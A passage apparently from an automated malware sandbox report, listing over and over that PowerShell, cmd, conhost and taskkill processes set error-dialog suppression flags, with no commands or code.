                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
